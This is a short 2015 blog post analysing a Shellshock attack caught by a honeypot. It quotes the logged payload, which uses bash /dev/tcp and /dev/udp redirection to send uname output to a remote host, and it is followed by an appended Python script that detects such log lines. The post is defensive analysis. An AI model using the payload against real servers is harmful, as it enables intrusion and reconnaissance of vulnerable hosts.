Thursday, 18 June 2015

Shell injection attack: /dev/tcp/ -- bash echo

My honeypot was attacked by:
Jun 18 06:42:08 beeswarm [mypyfwa] 2015-06-18 06:42:08.029145 - - [17/Jun/2015:16:11:21 +0200] "GET /cgi-bin/bash HTTP/1.1" 404 529 "() { :;}; /bin/bash -c \"echo  > /dev/tcp/; /bin/uname -a > /dev/tcp/; echo > /dev/udp/\"" "() { :;}; /bin/bash -c \"echo  > /dev/tcp/; /bin/uname -a > /dev/tcp/; echo > /dev/udp/\"" DE SHELLinjection
So, what is happening here:
  1. I needed to ask the experts what could be done via "> /dev/tcp/". The result is quite simple: a feature of bash could lead to opening a TCP connection to port 21.
  2. The attacker tried to report the vulnerability of my server to the IP address within the attack.
  3. He tried it via UDP and TCP.
The source of the attack was: which is a server hosted by "1&1 Internet Inc."

The reporting destination was: which is a server hosted by the same company.
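
A detection sketch for log lines like the one above, added here as an example (it is not the honeypot's own code): it flags quoted header fields that begin a bash function definition and lists any /dev/tcp or /dev/udp redirection targets they contain. The sample lines are constructed in the same format; the documentation address 192.0.2.10 stands in for the callback host, which the post does not show, and the function name `analyze` is hypothetical.

```python
import re

# A header value that starts a bash function definition: the Shellshock marker.
FUNC_DEF = re.compile(r"\(\)\s*\{")
# bash pseudo-device redirection: > /dev/tcp/<host>/<port> (or /dev/udp/...).
# Host and port are optional so lines with scrubbed targets still match.
NET_REDIR = re.compile(r'>\s*/dev/(tcp|udp)/([^/\s;"\\]*)(?:/(\d+))?')
# Double-quoted log fields, allowing backslash-escaped quotes inside a field.
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')


def analyze(line):
    """Return a finding dict for a Shellshock-style request, else None."""
    fields = QUOTED.findall(line)
    if len(fields) < 2:
        return None
    request, headers = fields[0], fields[1:]  # request line, then referer/user-agent
    hits = [h for h in headers if FUNC_DEF.search(h)]
    if not hits:
        return None
    callbacks = {m for h in hits for m in NET_REDIR.findall(h)}
    return {
        "request": request,
        "protocols": sorted({proto for proto, _, _ in callbacks}),
        # (protocol, host, port); empty strings mean the target was not in the log
        "callbacks": sorted(callbacks),
    }


# Constructed sample in the format of the honeypot line; TARGET is a placeholder.
PAYLOAD = r'() { :;}; /bin/bash -c \"echo > /dev/tcp/TARGET; /bin/uname -a > /dev/tcp/TARGET; echo > /dev/udp/TARGET\"'
LINE = '[17/Jun/2015:16:11:21 +0200] "GET /cgi-bin/bash HTTP/1.1" 404 529 "%s" "%s"' % (PAYLOAD, PAYLOAD)
WITH_TARGET = LINE.replace("TARGET", "192.0.2.10/21")  # documentation address, constructed
SCRUBBED = LINE.replace("TARGET", "")                  # targets missing, as in the post
BENIGN = '[17/Jun/2015:16:12:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"'

if __name__ == "__main__":
    for sample in (WITH_TARGET, SCRUBBED, BENIGN):
        print(analyze(sample))
```

The extracted callback targets are the part worth alerting on: they show where a vulnerable host would have reported itself.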